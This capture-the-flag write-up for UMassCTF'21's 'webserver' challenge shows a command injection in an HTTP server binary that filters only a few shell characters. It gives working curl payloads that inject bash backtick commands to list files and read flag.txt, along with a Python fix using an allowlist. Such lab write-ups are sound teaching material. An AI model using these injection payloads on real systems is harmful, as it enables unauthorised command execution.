UMassCTF'21: webserver

webserver

Category: pwn

430 points

Our webserver has a few flaws in it :(

http://34.72.232.191:8080

http://static.ctf.umasscybersec.org/pwn/f2c0ed71-c01d-467e-92bd-eb432bf606ad/a.out

Solution

The given file is a binary, which seems to be an implementation of an HTTP server.

file a.out
a.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a0e015bbe044f88bfcc6544ce015aca480b86641, for GNU/Linux 3.2.0, not stripped

[Screenshot: web1]

And following the instructions shown by the server…

[Screenshot: web2]

I’ve used Ghidra to take a look at the decompiled code ;-)

[Screenshot: Ghidra decompilation]

The exploitable part is on line 81 of the decompiled code. The echo from the instructions is executed as a system command, and we can put any command in its place. Also, on lines 74-78 we can see that the characters &, |, >, $ and < are replaced with a plain space, but nothing else is filtered.

To exploit the finding, I’ve used curl as below.

curl --path-as-is "http://34.72.232.191:8080/?/usr/bin/bash -c 'echo \`ls \`'" 
a.out echo flag.txt ynetd
curl --path-as-is "http://34.72.232.191:8080/?/usr/bin/bash -c 'echo \`cat -A flag.txt\`'" 
UMASS{f^gJkmvYq}
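As an added illustration, not code from the challenge binary, the character substitution described above is reconstructed in Python next to a hardened variant that uses an allowlist and never hands the query to a shell; the blacklisted characters and the query string come from this writeup, and the allowlist, function names and the use of subprocess are assumptions:

```python
import re
import subprocess
from typing import Optional

# Characters the writeup says the binary replaces with a space (lines 74-78 of
# the decompiled code). The substitution itself is reconstructed here, not copied.
BLACKLIST = "&|>$<"


def strip_blacklist(query: str) -> str:
    """Reproduce the binary's filter: blank out only the blacklisted characters."""
    return "".join(" " if c in BLACKLIST else c for c in query)


def still_dangerous(query: str) -> bool:
    """Report whether shell metacharacters survive the blacklist filter.
    Backticks, quotes, semicolons and newlines are not on the list at all."""
    return re.search(r"[`'\";\n]", strip_blacklist(query)) is not None


# Hardened variant (assumed design): accept a short allowlist of characters and
# pass the argument vector straight to the process, so no shell ever parses it.
ALLOWED = re.compile(r"[A-Za-z0-9 ._-]{1,64}")


def safe_echo(query: str) -> Optional[str]:
    """Return echo's output for an allowlisted query, or None if it is rejected."""
    if not ALLOWED.fullmatch(query):
        return None
    proc = subprocess.run(["echo", query], capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = "/usr/bin/bash -c 'echo `ls `'"  # query string used in the writeup
    print(strip_blacklist(payload))             # unchanged: no blacklisted characters
    print(still_dangerous(payload))             # True: backticks and quotes survive
    print(safe_echo(payload))                   # None: rejected by the allowlist
    print(safe_echo("hello world"))             # hello world
```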

Flag

UMASS{f^gJkmvYq}

luc © 2021